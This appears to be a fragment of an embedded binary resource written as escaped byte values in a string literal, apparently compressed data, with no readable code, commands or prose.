\\xb72\\x04(\\xb2\\xcb\\x106]\\xb2\\xed\\xe8\\x90\\\n\\x80DRH9\\xc62@\\x22\\x03Y\\x90\\x17Y\\x97\\x15\\\n\\xe4\\x1d\\xe4\\x1d\\x1a\\x8d\\xab\\x5c\\xed\\xdac@\\xe7c\\xe36\\\n:\\x1b\\xfb^e}\\xda\\xf7\\xcd\\xe2\\x22]\\x5c\\xf4\\xee\\xa2\\\n\\xa0O\\x9b\\xac\\x1b3\\xa3;\\x9d\\xee\\x84\\x16\\x22\\xe9S;\\\n\\x8a\\xc1qz\\x88\\x07\\xad\\x1d\\xd2\\xbeO\\xfb\\xb4\\xc7~0\\\n'A\\xd5dc\\xd8\\x85\\x92\\xce\\x89\\xc3\\xb2\\xeb\\xe6J\\x8a\\\n\\xeb2\\xc14\\x8e\\xb8\\xe3\\x18\\x85c\\xdaL\\xd3\\xe43\\x8e\\\n\\xee\\xc8\\x18\\x8d0L\\xb8C:\\xa6S\\xd3uq\\x19\\x82\\\n\\xab\\xa6)R\\xee\\xe0\\x8bx4&l\\xea\\x02j\\x94\\xa3\\\n\\xbc^k\\x9dtI\\xe8\\xab \\xf3\\xe2x\\xba\\xf6\\xc7\\xd1\\\n\\x9d\\xe7w\\x1e,\\x9f\\xdfA\\xca\\xd8\\x99&7\\x98\\xbc\\x9d\\\n+\\xf6]\\x94\\xae\\xd2\\xdau\\x94\\xa9)\\xb4\\x1e\\xb4\\x1e\\xad\\\n\\xe7M\\xb5l=Y\\x8f\\x8e\\xe7\\x8d8\\x9e\\xacFo\\x92\\\n\\x93\\xa7ql\\xd6\\x5c\\xbb&o\\xefh\\x1c_\\x05S0\\\n\\x091M\\x0a!\\xcapJ\\xea\\xa4q}gt\\x1c!\\\n\\x22=\\x818\\xfb\\xff\\x92\\x8c\\xc1\\xb5K\\x8f.\\xfd{\\x7f\\\n\\xe2\\xc5\\xf0\\xf4\\xf5*`\\xfc4\\x08+\\xf7\\xfc\\xcbkp\\\n\\xad\\x0c\\xdb\\x00\\xf4\\xa4\\x03:=\\xaa\\x80\\xa0\\xf1]\\xaf\\x95\\\n\\xbb\\x5c\\xbdw\\xcf\\x81|LG\\xa02\\xe1\\x803\\x8e8\\\n\\x8c\\xe3\\x98$I<\\xc6\\xe38\\x0e\\xc3\\x98\\x8c\\x1a8I\\\nv\\xe4\\x07\\x9e\\xbeM\\x0e^AAQ\\x14Ea\\xdc\\xb8\\\n\\xc2\\xc4\\x81\\x85\\xeb\\xe6n\\xee\\xaa\\x5c\\xe5\\xcal\\x03\\x97J\\\n\\xe5\\xca\\xcd\\x8b4M\\xdd\\x8a*M\\xd3\\x8b4\\xbcH\\xcf\\\n\\xc3g\\xe7iZ\\xb9\\x95\\x9b\\x9a\\xb3%\\xb7;\\xbf\\xa2B\\\n\\xd8\\xe1\\x07.\\xd4h\\x14UJ\\xc5\\x1c\\x08\\xec\\x8bW9\\\n\\xaa\\xcaK\\xca\\xcc/\\x87\\xc8\\x14\\xffJ\\x06\\x86\\xe3\\x06\\xa7\\\n\\xa6\\xa1\\xf4}\\xdf'b \\x1a\\xa2f \\xf2\\x89\\x86\\xac\\\n\\x89\\x1a\\xb2,+3\\x06\\x86\\x18\\x7f\\x17\\x04q\\xdd\\x8f=\\\n1\\x03\\x83\\xef\\xf7q\\x12\\x0c\\x03;\\xd7\\x8d\\x16M\\xd4\\x96\\\n-Tm\\xd5\\xd2Fw\\x1e\\xc0\\x9d\\x07w\\x1eP\\x0d\\xe3\\\n\\xe8\\xe1y=\\x91\\xa7t\\xabQmk\\xbb\\xa1\\x94ud\\\n%\\x16\\x8d\\xdf\\xb6\\x902J\\xd9\\xb6\\xad\\x94m[\\xc9\\xb4\\\nedd\\x8e\\x9e\\xddx\\xee\\xd1\\xc6\\x99:g\\xa0\\xf3'\\\n\\x1f\\xc7q\\xa6)#\\x1d\\x02\\xa4o;s*|B\\xe8\\\nD\\x17A}\\x93\\xd7\\x83\\x7f!`\\xdb\\xbe\\xfau\\xca\\xb6\\\n\\xbd\\xb3\\x0fW\\xbf\\xf6\\x00\\xb2\\x91\\x14\\xb2\\xd1\\x8b;\\xaa\\x05\\\n\\xb4\\x90\\x17\\xdc\\xfbP\\xbc3\\x87\\x81&\\xda\\xb92\\xb4\\xde\\\n\\x03\\xa8\\xce/\\x80\\xb4\\x00-\\x8c\\x06\\xd8\\x1c\\x10\\xc5\\x9c\\x14\\\n\\x9f\\xf1\\x1fnZ\\xcd\\x03\\x1fQ\\xb9\\x0d\\xfb\\xe7'\\xb3)\\\n\\x01Tn\\x84\\x97R\\x9dc\\xe7\\x05\\xa6Ti\\xe1*\\x0e\\\nA\\xa5\\xf9\\x95\\xcd>\\xff\\xa3 
\\xaa\\xe3\\xc6\\x02E\\xf6\\xc9\\\n\\x93\\xf9\\xcb\\xb4RY\\x99\\xd9\\xbe\\xf5\\x8c2\\x1b\\x9a\\xcc\\x18\\\n\\xfd\\x88\\xe6\\x80:9R\\x89\\xa8$+\\xf1\\xa3}?\\x04\\\n\\x98\\xa1\\xd7\\x10\\xec\\x92\\x9e\\xb8\\xc8G`\\x97\\xf4\\x0c\\x89\\xa9\\\n\\x8c7\\xb4\\x81\\xb3h\\x18\\x89.\\xf3\\x07\\x98J\\xe0\\x83;\\\n\\x97\\x8b`&]\\xf2\\xb4\\xd0\\xa294\\x04}\\x07\\xb4\\x06\\\n\\xaf2\\xc5\\x1b\\x1b\\x17x\\x95\\xf4\\xc66\\xb2\\xe9\\x12\\x97\\xb0\\\n\\xb6!\\xc4~\\x8e\\xb3\\x03L8%p>E\\x1a\\xbc]\\\n\\xe8\\x01\\xd9\\xda\\xf3\\x9d\\xde\\xcd\\xb4\\xe8\\xbc]v\\xf3\\xf1+\\\n\\xcf\\xf4\\xe0\\xa4\\x84j\\xa3\\x17\\x84\\x9bq\\x01\\xa1\\xba\\xf4\\xe5\\\n\\xf2\\xcb\\xecr\\x01\\xe1\\xa5tL]\\xaf\\x9d\\x13A\\x85\\x04\\\n\\xf7\\x15O;\\x8e\\xb3\\x1d\\xa6\\xa0n\\xe2\\x22.\\xa6Q\\xd6\\\n\\xdd$\\xb7\\xb1\\xb3\\x9d\\xfa\\xa0\\x0aB\\xb7\\xf3\\xb8]\\x17\\x86e\\xec\\\nL\\xfe\\xe0\\x0f\\x93\\xdbt\\xe9x\\xf0p\\x5c\\x80h\\x04\\xc6\\\nt\\x1a\\xd3)j\\xd2\\xc9\\xef\\xc2\\xae\\x9bO\\x8d!R(\\\nW\\x05\\xad\\x9cj\\x94r\\xe3m\\xe4\\x12n=\\xcfq\\x9c\\\n\\xd0E\\xd0\\xc7^\\xd0s\\xfa\\x17\\xdcy~\\xe7\\xc1\\x9d%\\\n\\xcb/\\x96\\x01xu\\xe8\\xb4a'\\x1c!\\xb4\\x1f\\xd0z\\\n\\x00Z\\x0bs\\xac\\xdae\\xee\\xad%\\x9e\\xe3\\xc9\\x09\\xcfi\\\n\\xe5\\xc4\\xe41y\\x81v\\x94\\xab\\xb4\\xab\\xb5\\x1e\\x5c\\x85\\x03\\\n\\xa3\\xe3m\\x03G\\x08\\xb1\\x95\\xd38\\xb9\\xdb\\xbeK\\xfb\\xcc\\\n\\xf3\\x93\\xc9\\x9bh2A\\xa8\\xc46UA\\x97\\xfc\\x1f\\xff\\\n\\xaf\\xbd\\xe7\\xa6U\\xb8\\x0d\\x0a\\xa9&\\xc2m\\xac\\xcf [\\\n\\x93P\\x05\\xbb\\xa7\\xd7<\\xbc\\xb6\\xbd\\xd1\\xc1\\x96> \\xab\\\n<\\x17G\\xec:9\\x8e\\x9e'\\xd5\\xbd\\xf7\\xc4\\x1b\\x0e\\xa0\\\n\\xc5\\xe8Y\\x22\\xb0\\xc3\\x00\\xf1y\\xed\\x0c\\xa2\\xcb\\x16\\x05\\xc8\\\n\\x0b\\xf2\\x22\\x1fw\\xd8ZAh\\xa2\\xd6\\xd0BY\\x8e\\x97\\\n\\x19\\xfe\\xd8Q\\xa5\\x84]e6\\xb2\\x9bR\\xe4\\xb3\\x03\\x04\\\n\\xe1\\x05p\\xde\\x11v\\xe1\\x85\\x81\\x0f\\x1a\\xb0\\x89\\x85\\x04\\x1e\\\nqS\\xeemI^\\xec=\\xab\\xa3\\xa4\\x90\\xc2%\\xa1\\xb4\\\ne\\xa0\\xc8/#K\\x84\\x10\\x99\\x92\\xe0>\\xb7\\x80\\xc9\\xee\\\n\\x99\\x92p3d\\xa5\\x1f]\\xe9\\xf6\\x89G\\xbc\\xb1\\x8f\\xeb\\\n!\\x1f\\xfb`7\\x17\\xc0\\x93\\x06\\xdc\\xb8\\x8eWiu\\xda\\\n\\xb4\\xd7\\xfe\\xfc\\x0e\\x0f\\x00\\xee<\\xf8\\xabM<\\x02}\\x5c\\\n\\xc7[l\\x128:r\\x02\\xdb}\\x83\\xf0\\xcc\\xb5\\xea\\x8d\\\n\\xadlI\\xc7\\xa3\\x89:\\xc2>\\xd6`w\\xdd\\xe31\\xee\\\n\\xe0\\x94\\x90Re~\\xe04Y\\xe5\\x8f^\\x97)@\\x96\\\n\\x8b\\xcew\\x9c!\\x0c\\x84N\\x9ef7\\x1f\\xbf\\xb2\\xe9\\x06\\\n'e\\x13Lz\\xc1&<\\xb6\\x00#\\xf0\\xfa\\xbf\\x8b[\\\ni*\\xfb\\xcb/{)!,\\x90x\\xbd1\\xda\\x8c8\\\n\\xad\\xd3:-\\xc7g\\x00\\xa0\\xc8G\\xb40\\x09\\x1e\\xe3\\xf7\\\n\\xe7E\\xce\\x0e\\xc8\\xad;\\x10zc\\x884\\xae\\xe1\\xd1j\\\n9\\xe7\\x1c\\x08/\\xce\\xe1\\x02R\\x13EP\\xb9\\x16-\\x9d\\\nV\\x10\\xa6@WQ\\x19\\x08u\\xa5\\xc8)\\xd0\\x22\\xa9\\x84\\\n>)D\\xb2;.\\xab\\x00YI\\xb1O,U\\x87\\xac\\\nPZ%;J\\xb2\\xa1\\xcc\\xca(\\x1b\\xfc\\x22\\xf6\\x07;\\\n\\xa0f\\x88\\x9a(\\xa2\\xd93\\xdaA3XT@3d\\\n\\x0dQI\\xd4\\x0c~d\\xb2\\xc2y\\x0d}\\x10\\x13\\xc4c\\\n\\x1f\\xf4\\x89W\\xd33$I?\\xe5l\\xb7l\\xd3\\xea\\x14\\\n\\xef\\xa5?\\xc3\\x14\\x80\\xe1\\xaf6\\x14\\x09=;\\x18\\xddx\\\n\\xf4T\\xb3@j\\x0e%\\xc0\\x80\\xc1(\\x80\\x04|$T\\\n2\\xad\\xa47\\xb6\\xa9lI\\xc7V\\x82\\xa7\\x0cz\\xd2w\\\n\\x15n+\\x1d\\x0f\\xcf\\x99\\x8e\\xc2\\x9d\\x94\\x8a\\xf3\\xcame\\\n\\x02\\x9e9lB\\xbaW/q5\\x84\\xd0\\x1b\\x16\\xce\\xde\\\n0\\x9a\\xa5\\x1b\\x01R/\\xa8R\\xbe\\xba\\x09\\x9d\\xc7v\\x01\\\n\\xff\\x8e*%\\xab=\\xa88\\xfdF\\xb6\\x04\\xb0\\xdc\\xde\\x13\\\no\\x04/\\x8a\\xfc\\xe0\\x06X\\x8c`\\x85p\\x8d`\\xf2\\x22\\\n\\xafR\\x13\\x03\\x8ex\\x90\\x8c\\x9e\\x1d\\xdb\\xfd\\x9dk\\x9f\\x
ef\\\n43\\x02\\x01\\xe5\\x9e_\\x98\\x1a\\xa8r\\xd5\\xf5.\\xb4\\xe3\\\n\\xa2:\\x13\\x13^\\x90\\xb27\\x01ya\\x9b\\xdc\\xf66 \\\n\\xad\\x92\\x03t\\xd8\\x96\\x95\\xcd\\xfe/\\x5c\\x92\\x9d\\xca\\xab\\x84\\\n2+\\xa3\\x86\\xc8\\xb7*\\x00\\xfe`O\\xf8\\xe3\\x5cp\\x04\\\nV\\xfcCF\\x135C\\x06Md\\x10\\xa3\\x817\\x8fM\\\n\\x0d,\\x15_\\x1f\\x8fM4\\xf4~\\x5c\\x13o\\xbd\\xb1v\\\n\\xf2\\x07w\\xe0\\x01\\xf5\\xbb|\\xf2\\x86L\\xd8%;\\x9f\\x80\\\n~\\xf0\\x03\\xf0\\xd0\\xb6\\xea?\\x17\\x81L,\\xe8\\x99\\x0e\\x0e\\\n\\x0b\\x09\\xf0\\xc66\\x1d\\x0dv\\x13\\xbcQ\\x1c@R.P\\\n\\xa5T\\x99\\xe9\\xea\\x9b`\\xf4\\xaa\\xcco3\\x06|o\\x17\\\nz#]\\xb6\\xcb\\xbb\\xb0w\\xddNj\\xe7\\xbf\\xf9\\xa7\\xc6\\\n\\x02\\x90n\\x93n\\x5c\\xb0\\xf5\\xd3M\\xca\\xf6\\xda\\xb1\\x0f\\xf0\\\n\\xf8\\xfb\\xc0\\xeb\\xffN:\\xd0\\x8f1\\xed\\xed_pb\\xcb\\\n\\xc1\\x88[\\xe7vn\\xdb\\x0b\\xc2S\\xc7P\\x86t\\xa4\\x12\\\n\\x1c\\xd7\\x01\\xc3\\x0e\\x92_-z\\x80V\\xaeg\\x02x\\xf6\\\n\\xc7A\\xa5\\xae\\xcf\\xc6\\xa0\\xc8+u\\xbd\\x03\\xa8\\xcc)`\\\n\\xfdA\\x9b\\x0d\\xd0\\x82|#\\x92\\xea\\xca\\xf4\\x19\\x95\\x95\\xf3\\\n\\xb5\\xca\\xca|\\xef\\x09\\xceeuT\\x86\\xa14h\\xe6\\xee\\\n\\xf0\\xe3\\xc1\\x903>d\\xae\\x066C\\xd6\\x0c\\xb6\\x82p\\\n\\xd4\\xa2;\\x18:\\x1b\\xaf&\\xae\\x07\\x9f\\x80f\\x014\\xc6\\\nAN[\\xdc\\x07w\\x1ep\\xe7\\x93wy\\xf0\\xd7\\xaa2\\\n\\x0bvy\\x91\\xd7\\x06u\\xe9iA#\\x0f\\x9dW\\xeeL\\\n\\x8d\\xa0,M\\x80\\xb5A\\xadD4D\\x16\\x10\\xeb\\x99\\x8d\\\n\\xe2\\x0fH\\x8b\\xa6\\x1a=5zho\\xa4\\xcd\\xca\\x0c=\\\n\\x05H\\x06\\xe0t\\xe76~\\xe7\\x07\\xa17:C8\\x0a\\\n\\x97.\\xd3BO\\x7f\\xe5\\x17\\x22\\xcd\\x9e\\xe9A,\\xb2\\xaf\\\n\\x82\\x894\\xfb*\\x8c\\xa8|\\xf1\\xfc&&\\x15<\\xd7\\x02\\\nj/\\xa0\\x95\\xe17\\xd2\\xa4\\x82\\xef}(\\xde\\x99\\x83\\x80\\\n\\x22\\x07\\xcal\\xbf\\xfd\\xbd\\x11o\\xf4\\xc6\\x9dN\\xa1\\xf2P\\\n\\x89W\\xe4\\x07z\\xbf\\x04\\x13$\\xecU\\xc0\\x82\\x0a\\xaeh\\\n\\x00\\xb2=\\xf0\\xcf\\xces\\x81-\\x0a\\x22-p\\xcd\\x17\\xd5\\\nyGx\\xb1\\xf7\\x048\\xef\\xe6\\xba\\x80\\xdd\\xfd{\\xaej\\\n\\x00\\x95\\x176\\xe7W\\x90\\x1f\\x05\\x02\\x85k]\\x81l0\\\nGz\\x13\\x99\\x8bz\\xd5\\xd1\\x9fG\\x023\\xec-@i\\\n\\xff\\xed\\xdbF\\x00\\x88\\x1b\\xdf\\x80\\xfevy=\\xe4[X\\\n\\xd4\\xb0#\\x1d\\xbd\\xe4\\xcf\\x0e\\x15\\x80\\xf2\\xda\\x0e\\xdf\\xa8L\\\n\\x1f\\xd7\\x22\\xba\\xd2\\xf4\\xe4\\x0a\\xc3\\xce\\xaf<\\x8d\\x1d\\xa3\\xd4\\\nHS\\x15\\xf3t\\xeb{\\xda\\x8eV\\x1a\\x8f~ID\\xa3\\\n\\xb1\\x01ck\\x8a\\x84\\x82>\\xc6r\\xfc\\xf9]\\xd6ko\\\n\\xec2E2z]8\\x0aw\\xda\\xdc\\xd0B\\xfb\\xeb\\xec\\\n\\xe6c\\x11\\x1b\\x1f\\xe0\\xda&e\\xf6\\x01N\\x7f\\xe1\\xcb\\xe5\\\n\\xe3\\xd8\\xf8\\x00SJ\\xf6\\x94\\x98\\xc9\\xa9\\xfb\\x93V\\xb6\\xe4\\\n]+\\xc5;\\xf6/\\x7fg_\\x9f\\x81\\xf3\\xe1*\\x12L\\\n\\x04`T \\x019z0\\x8e\\x9e\\x95\\xfd\\xb7~u\\xcf\\\n\\xdd\\xc7^\\xfaV\\xfe\\xa6\\x13\\xb9pI+\\xce\\xbb9\\x9c\\\n'\\xbc\\xe0\\xbc\\xab\\xd2\\xb0\\xab\\xac\\xbb\\x97\\xecl'\\xa1\\x01\\\n\\x86\\x1a\\x98\\xb8\\xca\\x8bY\\x03\\xc8\\x8b\\xa3\\x1e\\x22\\xf3\\x85\\xca\\\nv*\\x028\\xa6\\x04 +3.!\\xf5g\\x0d0\\xb5\\\n\\xfd!k,@\\xd0\\xb7\\x08!.O\\xcbl\\xf0\\x07\\x0c\\\n\\xd8\\x05\\xc6\\xc1\\xf7F\\xb3;\\x1aY\\xe1Q-\\x9d?\\xe3\\\n\\x0e\\x9f\\xc4\\xdc\\xe1\\x8b@F\\x90\\x17\\xfe\\x90\\xd7\\x81G#\\\nq\\xe7\\xd6w\\x93\\x89s\\x85F\\xb1W\\x82\\xf9=\\xa0\\xbc\\\nF\\x0am\\xee\\x1b]\\xd1\\xcfiO\\xa1\\xc1[\\xb0\\xf5\\xb0\\\n\\x13\\x02\\x22P\\xc8\\xfd\\xf4m\\xbfks\\x8f\\xb1\\xf3\\x03\\x92\\\n\\xd1\\x19\\x5cO\\xb9\\xd3\\x90\\x81\\xee^\\xde`-\\xc0\\xd6O\\\n7\\xa4\\xb4:\\x02\\xea\\x8d\\xb1\\x00q\\xd9-\\x9f\\x22\\x9d\\xbd\\\n\\x05\\xd8N\\xb2\\x95!\\x1d\\xf7\\xdck\\xc08M\\xd3\\xa0\\xd3\\\n>\\x0d\\x82 
\\x88\\xbb\\xbcs\\xb5\\x1b\\xf7'\\xedI-\\xe2\\\n\\xc0\\xe9\\x5c\\x95w\\xc3\\xa9'\\x8b\\xae\\x93\\x0a\\x92 \\xf0\\x1c\\\ngb\\x9a\\xec`#\\xe7\\x00\\xa1=,\\x0f\\xaf\\x1d\\xe5(\\\n\\xadE\\xf1\\x9b\\xb8\\x89\\x9b\\xf3\\x8b\\xf38\\x8e\\x9b\\x9eft\\\nTV\\xa5A\\xd1/\\xdc X\\xc4\\xcd\\xc2\\xeb\\x82\\x05\\x9e\\\n\\x1b^\\xf4\\xe7\\xae\\x94Rv\\x0ch\\x01B h\\xe1\\xa4\\\n\\x15I\\xd0\\xa7c\\xef\\xf4\\xce\\xa0G\\xdde]\\xe7fM\\\n\\xd6d\\xcd\\x98\\x0c\\x8d\\x93\\x0ci3\\x921\\xe8\\xd8\\x9d\\xfc\\\n\\xa9\\xf2\\x01\\x7f\\xf2'\\x80.+\\xc3\\xe1$\\xda\\x85\\x97\\xd1\\\n\\x10\\xe2\\xe3\\xfb~\\x135Q\\x176\\x99O\\xe8\\x97\\x99O\\\nHHHy\\x82\\xb3\\x8b/\\x13\\xb7E\\x8e;w\\xe7z\\\n\\xbeS\\xc4\\xbbh\\xeb\\xfb+\\xbf\\xd1Z\\x8fC\\xf6gw\\\n\\x96\\x0f\\xbezw\\xb9|p\\xdbE\\x05\\xd5r+R=\\\n\\x8a\\x00\\xd7\\xa5\\xf5\\xb4\\xf6&\\xd7\\x84\\x7f\\xae+\\x84V\\xae\\\np\\x1c\\xa5]\\x0f\\x847!\\x94\\x00O\\x8b6\\x12\\x1a\\xe1\\\nh\\x84v\\x18\\x99\\xbb\\xb1\\x84\\xe0\\x06\\x8eZh\\xd7\\x0d\\x84\\\n\\x9b\\xe8d\\x08]\\xed\\xb8f\\xf7O\\xbe\\x8b:\\xeb\\x80u\\x02\\x99$\\\n\\xd3\\xb8(\\xe4\\xd4\\xe7\\x14H\\xf1\\x83\\x8e\\x11\\xd0\\xac\\xaeW\\\nNTf~\\xdfDA\\x95\\x16\\x09@\\x95\\x08\\xedW\\x18\\\n\\xf1\\xa7T\\xe7\\x1d\\x8973\\xd1\\xcf~\\xed_\\xbe\\xe6&\\\n\\x18\\xf9\\xf8\\x95v\\xf6\\x08/f\\xb1\\xcdu!\\x13\\x09\\x5c\\\n\\x9c\\xd3\\x85\\x17\\xe7\\xd0\\x15.&-8\\xb3FjL/\\\n\\x92\\x05\\x07\\xa7h\\xd3Lh2\\x90\\x16\\x91\\xea\\xa6\\x85\\x9b\\\n\\xecHv*\\x1b\\x9alh\\xb2\\x99\\x1eyn\\x0f\\x9cy\\\n2g\\x150\\xce\\xe2\\xfe\\xe4\\x9f;\\x07\\xa3&\\x03;\\x85\\\n\\xd5\\x9cq;\\x7f\\x08\\x18iy\\xa9\\xe5\\x93\\xf8\\xce\\x83;\\\n\\xd0\\xb9e\\x06\\xc2\\xe2\\xb1m\\xcbK\\xb5\\x00W\\xa3Z\\x09\\\n\\xde\\x88+\\xa8\\x8cN\\x04\\x15\\xd2S\\xa3pu+\\x95\\xa7\\\nz)t\\x1b)\\x07\\xa1\\x19\\xd8\\xbb:\\x84\\xcf\\xbe\\xb7\\x17\\\n\\xfe\\xc1\\\nyW\\xe4\\x06Q\\x86>)\\xc87'\\x85\\x16\\x89W\\xe8\\\n\\x99>\\x06\\xe5\\x92\\x9a\\x1647\\xad\\x0c\\x101\\xa7\\xb0z\\\n\\x9a\\xecT6\\x1c6\\x11\\xb6Jh\\xe4\\x7f\\xc4\\xc4fU\\\n\\xa0<*!Z\\x0d\\xb9<\\x1d|\\x13\\x0d\\x1cE\\x8f^\\\n\\xf5R\\xfb\\xe0\\xce'\\xef~\\xf2._\\xe4#)I\\xe3\\\n\\x91V\\x92j\\x015\\x88H\\xbb\\x0a\\xda\\xa8\\x91\\xb4HO\\\n\\x8b\\xd1\\xd3\\x9ebt[\\x22\\xd5\\x90\\xba\\x15R\\xa8\\x80*\\\n\\xed\\x1dF\\xbf\\xf1=\\xcd\\xb8\\x9f\\x9f\\x00\\xee\\xe2\\xf0\\x9a\\xe7\\\n\\xaf\\xf6$\\xdfX\\x1f ,\\xb4{\\xcaU\\x0b\\xd0\\xf5\\xef\\\n<\\x167\\xbf2\\xee\\xdf\\xb5\\x8d^d_]\\x1b)\\xdf\\\n|<\\xc6@\\x1f\\x8f\\xb4\\xf2\\xf5\\x7f\\xdf\\xa7\\xd6\\x02d\\xcf\\\n\\x17\\x8d3\\xf5\\xe4\\x85l\\xc5\\x0f\\xb6A\\x1f\\x941U}\\\ns\\x93\\xd6\\x13\\xaf\\x8c\\x16\\x01\\xd4\\xdb]0\\xb6\\x9c_\\x98\\\nt\\x1e\\x89\\x0c;Fo\\xf4Z\\xcf\\xe2\\x88\\xc7}\\x1a\\xe0\\\n/\\xb1\\x05\\x16\\xb1\\xbe\\x8e%\\xad\\x5c\\xc7\\xb25#\\x81\\xf6\\\n=_T\\x9c\\xd3\\x11^\\xa4\\xe1\\xc5\\xf9E\\x1a>sI\\\n\\xe7\\xbed \\xd9i\\x91\\xec\\xf2\\xc2\\xe8\\x01\\x07\\x15P\\xae\\\n9\\xa5\\x92]Z\\xa9\\xbc2ps\\x83E\\xd4\\x96a\\xd0\\\n\\xbaOs\\x80g\\xe5\\x7fl\\x05\\xcc\\xda+\\xc1\\xe5\\xe9`\\\nBH\\xf0\\x07?\\xd8\\xe5u\\xb0\\xf3\\x07\\x7fHv~4\\\n\\xf0\\x09\\xbc\\xfb\\xe0\\x0e_\\xbcD\\xe5\\xa2N\\xf7O 
[binary payload omitted: this record's "text" field continues with several hundred lines of an escaped byte-string literal (an embedded binary resource blob, e.g. generated resource data compiled into a Python module); the bytes are non-textual and carry no recoverable code or prose, so only this placeholder is kept]
4\\xd7\\\n\\x0a\\xdd?\\x98\\xd0\\xccc\\x14\\x00\\xf3\\x98f>\\xd35j\\\n\\xcf\\xaf\\x18\\xf5=\\x9f\\xfa5\\xf5\\xdd\\x13\\xb5\\x0f@WU\\\n\\xa5}\\x9fV>\\xf5\\xfb\\x87\\x09Q\\xf7\\xa9\\x09T\\xa7>\\\n6A\\xeb\\xda\\xe6\\x0f\\xb8w\\xf7\\x195\\xf5\\xa9O+F\\\n\\xfd\\x8aV~M\\xfd\\xda\\xd7\\xf0\\xe0U^\\xc5\\x0e\\xd0V\\\n\\xd2\\xf7Z\\xcf\\xaf\\xdb\\x03\\x08\\x08\\xaf5 _+\\xa1\\x8d\\\n\\xb1'\\x85\\x06\\xa0\\x05\\x93\\x11\\xb8\\xc8\\xa1\\xb8\\x90P(\\x02\\\np\\xf0_\\x89<\\x10y^FyP*\\x0e^\\xb2\\x5c\\\n%*Y\\xe4\\x0bD\\x89J\\x93(O\\xb2\\x00\\x8b\\x049\\\n\\x12\\xe4Hr\\xc4\\xc8\\x8e\\x91&\\x86o\\x09\\xd2$\\x81\\xb5\\\n\\xf2\\x8c\\xa5\\x07\\xe0\\xba\\x1aa\\x00@F\\xbb+p\\x9d\\xd4\\\n0\\x801K\\x13\\x9d%\\xa9\\xcb\\x04\\xb3\\x92Xqf\\x04\\\n\\x80VA\\x1e2\\xad\\x02]D\\x9a\\xe5\\xa1I9\\x82\\xe2\\\n\\xd9<4\\xf8\\x91\\xcd8by\\x94\\x87\\x85\\x092w\\x81\\\ng\\x0eHR\\xd2F \\x8av\\xa2lJ\\x97\\xf3\\x9c\\xf5\\\n\\x9e\\x02O2\\xcf\\x0e\\xa5\\xd2\\xdaUF\\xd2jS\\x82\\x84\\\na\\xf0\\xd45e\\x95\\xaf\\x19\\xfa\\x12\\xbb\\xa6\\xf7\\xbfD\\x00\\\n8\\xf8\\xa6_\\xccx\\x83\\x0av\\xaca02\\xc7\\x87\\x93\\\n@\\x9e\\x14\\xadM\\xf62 \\xcf>\\xfb\\xb2\\xd5\\x82\\xab\\xa0\\\n\\x94\\x02\\x5c\\xf1B (]q/\\x04\\xc8E`jr\\\n\\xb0\\x12A\\xbeH\\xd2\\xf9\\xc2\\x0e\\xfd1\\xcb\\xa3\\x14\\xc7'\\\nq\\x06l\\x04u\\x92\\x9a,\\x80\\xebt\\x80m2\\xfa\\xde\\\nP\\x02\\x10B\\x862`\\x0f\\xff\\x13\\xf3\\xa2\\x01\\xc4Y\\x9a\\\nh\\x96`\\xceR\\x96\\xea\\x0c\\xa9\\xcer\\xad\\xb4\\xe2\\x0c!\\\n\\xf2\\x10\\xba8\\xd1\\x0b\\x06\\xe3$fy\\x08\\xad\\x02\\x9c \\\n\\xe3Y\\x12\\xb2<\\xd2\\x0a\\x80d`2\\xd3\\x11\\x22\\x16e\\\n\\x05g%TTDET\\x14\\x0a\\x85\\xc8\\x91\\x172T\\\n(\\x84|\\x1f\\x5c\\x17\\x12L\\x82Ix\\xd0\\xd0CO\\x91\\\nd\\xba\\x05\\x93\\x90\\x90\\xcck!Z\\xddz-\\xf3\\x98W\\\n{\\xcc\\xd7\\x07\\xac\\xf2|Q\\xe1\\xa0\\xd6\\x15eU\\xed\\xb3\\\n\\x8a\\x82U\\x95\\xe9\\xb5\\xb42\\x9d\\x98\\xfa\\xa6\\xab\\xfb\\xd4t\\\nn\\xf7\\xde?k\\x9fU\\xb4\\xf6\\x99o\\x9f\\x15eU\\xad\\\n+\\x9fV\\x07\\xcc\\xf3\\xbd\\x1a^\\xed\\xf9\\x1e;\\x80\\xc7\\xec\\\n\\x08\\xd4\\x8a\\x16\\xb2b^\\xeb\\x19\\xb8\\xc80\\xbf\\x95B\\xde\\\n\\x93BF\\xad\\xbc'\\x05\\xd7B\\xae\\x90K\\xc1e\\x01%\\\n\\xc0s\\x14A\\x19\\xe4\\xd0\\x08r\\x88@\\x97\\xb9\\x80de\\\n\\xc0\\xcbh\\x8e\\xb9\\xc1\\xfc\\x93(\\xc9\\xca\\x05\\x10\\x9f 
\\x03\\\n\\xe2$=N\\x934A\\x02\\x8d$9Ab\\xf8\\xe6\\x9e\\\n\\xb6\\x19\\x5c\\x0d\\x0b\\xd8f\\xffF\\x07\\xd8\\x8a\\x9c\\xdd\\xde\\xc4\\\nPo\\x0b\\xd8/6\\x93\\xa4\\xff\\xa9X\\xc0*\\x8b\\xf3\\xb0\\\n\\x97\\x07(M\\x1c\\x01\\xa0\\x8b\\x08\\xd0&^\\xc5\\x06\\x1e\\x17\\\na\\x11\\x82\\xe5!\\x14\\x07X\\x8eH\\x03\\x8a\\x9b\\x86S\\x84\\\n,\\x0f\\x95\\x8cr3y!/\\xc2b09\\x89\\xa9\\x94\\\n\\xe4\\x19\\xc1`4E\\xa7KKa\\xd4\\xecv\\x18\\x04\\xe3\\\nD\\x00\\xdd\\xa8\\x8c}\\xa4\\x91\\xae\\xa9\\x91\\x18\\xb5\\xaf\\x99\\xae\\\nAk_\\xb3\\xcax\\xeb\\xe0J\\xf2\\x99o\\x00\\xd0\\x0b!\\\n\\xa3t\\xc0\\xf6{\\xbd\\x09\\xd1`\\xdeVg7z\\x9e\\xc9\\\n\\xfc\\xe3\\xcaY\\x1d\\x9b\\x0e_\\x9a\\xe0\\x15\\x83\\xb4\\x97\\x9c\\x19\\\n\\x84\\xd7\\x95\\xe5An\\x1c\\xfb\\xf3(\\x9d/\\xe6Qj\\xfc\\\n\\xfc\\x18*\\xf5\\xc3\\xbe\\xba\\xa7\\xdfw\\x00\\xf0\\xe3\\xff2\\xe0\\\n\\xad-\\x89\\xd4K\\x00\\xf7\\xc3\\x86\\xf6\\xb0\\x1f\\xc8\\x10#C\\\n\\x8c\\x18\\x89Q\\x0c\\x90\\xc5\\xc8b\\xc4\\xf6\\xa7E\\xa9\\\n\\xcc\\xae\\x8ba\\xac\\xc4\\x00\\xdb\\xf9!\\x05\\x8c\\x98*\\xa5\\xb0z\\xbe\\x8c\\\nJ\\xd3\\xb1K\\x